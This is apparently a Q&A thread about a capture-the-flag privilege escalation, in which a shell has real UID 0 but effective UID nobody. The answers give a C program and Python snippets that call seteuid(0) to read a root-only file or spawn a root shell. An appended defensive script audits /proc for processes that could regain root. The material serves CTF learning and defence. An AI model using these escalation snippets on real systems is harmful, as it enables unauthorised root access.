
I'm participating in a capture-the-flag contest where I must implement some form of privilege escalation to read the flag.txt file. I've noticed that when I run whoami I get the following result:

myHostHere:/$ whoami
nobody

But when I run id my UID is set to root:

myHostHere:/$ id
uid=0(root) gid=65534(nobody) euid=65534(nobody)

Does this mean it's possible for me to act as the root user, or am I misinterpreting the output?

Edit:

The output of ls -l flag.txt is as follows:

-r--r-----    1 root     root            34 Feb 10 12:00 flag.txt
  • This can be helpful: https://unix.stackexchange.com/a/191955/53467 – gronostaj Mar 17 '20 at 07:17
  • @gronostaj so am I correct in saying that my current shell process (sh) was created by 'root' but all actions executed within this shell have the privileges of 'nobody'? –  Mar 17 '20 at 07:31
  • I'm not sure. Try `ls -l $(which whoami)`, maybe it has the setuid bit enabled. Or maybe your shell does. – gronostaj Mar 17 '20 at 07:33
  • Neither `sh` nor `whoami` has the setuid bit enabled (I also did a `find / -perm /2000` previously, which returned nothing). –  Mar 17 '20 at 07:41
  • Please edit the question and post the output of `ls -l flag.txt`. – Kamil Maciorowski Mar 17 '20 at 10:12

2 Answers


This can be solved by writing and compiling (with --static) a C program like so on a separate machine:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    /* The real UID is already 0, so an unprivileged process may set its
       effective UID back to it. */
    if (seteuid(0) != 0) { perror("seteuid"); return 1; }
    /* With effective UID 0 we may also take root's group. */
    if (setgid(0) != 0) { perror("setgid"); return 1; }
    return system("cat flag.txt") == 0 ? 0 : 1;
}

This file can be copied over to the CTF machine, given permission to execute with chmod +x, and run from the tmp folder.


I created a setup very similar to yours. I did it with a debugger (examples: here and there). In the affected shell I have:

$ whoami
nobody
$ id
uid=0(root) gid=65534(nogroup) euid=65534(nobody) groups=65534(nogroup)
$

Then, according to this answer:

File access, and operations that require root privileges, look at the effective UID and GID.

Indeed, this is what happens:

$ ls -l flag.txt
---------- 1 root root 4 Mar 17 08:57 flag.txt
$ cat flag.txt
cat: flag.txt: Permission denied
$

But I can do this:

$ sudo cat flag.txt
foo

Or this:

$ su -
# whoami
root
# cat flag.txt
foo

Or this:

$ sg root 'cat flag.txt'
foo

When you have uid=0, anything that can use the seteuid system call and then read the file can help you. E.g. Python:

import os
os.seteuid(0)  # real UID is 0, so this succeeds without privilege
with open('flag.txt', 'r') as f:
    print(f.read())

Instead of (or aside from) reading the file you can spawn an elevated shell:

import os
os.seteuid(0)
# argv[0] must be set; the new shell inherits effective UID 0
os.execve("/bin/sh", ["/bin/sh"], {})

In this shell you're root; cat flag.txt will work.
Testbed: Debian GNU/Linux 9.

Kamil Maciorowski
  • Unfortunately the system in question does not have `sudo`, `gdb`, etc. installed (and installation requires root permissions) and any attempted usage of `su` throws the following error: `su: can't set groups: Operation not permitted`. –  Mar 17 '20 at 09:51
  • @JamesDiamond Is there anything that can call `seteuid`? Compare the Python example in the now expanded answer. – Kamil Maciorowski Mar 17 '20 at 10:31
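The second answer rests on the distinction between the real UID (0 here) and the effective UID that file access checks consult. The following is an added example, not code from either answer, that turns that distinction into a defender's audit: it reads the `Uid:` line of `/proc/<pid>/status` and flags processes whose effective UID is unprivileged while the real or saved UID is still 0, the incompletely dropped state the question describes. The sample status texts are constructed, not captured from a real machine.

```python
# Added example (not from the thread): audit Linux processes for incompletely
# dropped privileges. /proc/<pid>/status lists "Uid: real effective saved fs".
# File access checks use the effective UID, but seteuid(2) may switch it back to
# the real or saved UID without privilege, so euid=65534 with ruid=0 (as in the
# question) is not a real drop: seteuid(0) succeeds.
import os
import re

def parse_uids(status_text):
    """Return (real, effective, saved, fs) from the Uid: line of a status file."""
    m = re.search(r"^Uid:\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s*$", status_text, re.M)
    if not m:
        raise ValueError("no Uid: line found")
    return tuple(int(x) for x in m.groups())

def root_regainable(uids):
    """True when euid != 0 but the process could still call seteuid(0)."""
    real, effective, saved, _fs = uids
    return effective != 0 and (real == 0 or saved == 0)

def audit_status_texts(statuses):
    """Map pid -> UID tuple for each status text where the drop is incomplete."""
    return {pid: parse_uids(text) for pid, text in statuses.items()
            if root_regainable(parse_uids(text))}

def audit_proc(proc="/proc"):
    """Run the audit over the live /proc; unreadable or vanished pids are skipped."""
    statuses = {}
    for name in os.listdir(proc):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(proc, name, "status")) as fh:
                statuses[int(name)] = fh.read()
        except OSError:
            pass
    return audit_status_texts(statuses)

# Constructed sample status texts (not captured from a real machine).
SAMPLE = {
    1234: "Name:\tsh\nUid:\t0\t65534\t65534\t65534\nGid:\t65534\t65534\t65534\t65534\n",
    2345: "Name:\tnginx\nUid:\t33\t33\t33\t33\nGid:\t33\t33\t33\t33\n",
    3456: "Name:\thelper\nUid:\t1000\t1000\t0\t1000\nGid:\t1000\t1000\t1000\t1000\n",
}

if __name__ == "__main__":
    for pid, uids in sorted(audit_status_texts(SAMPLE).items()):
        print(f"pid {pid}: ruid/euid/suid/fsuid={uids} -> seteuid(0) would succeed")
```

On a live system, `audit_proc()` applies the same check to every readable process; a properly dropped daemon uses setresuid to set all three UIDs and will not be flagged.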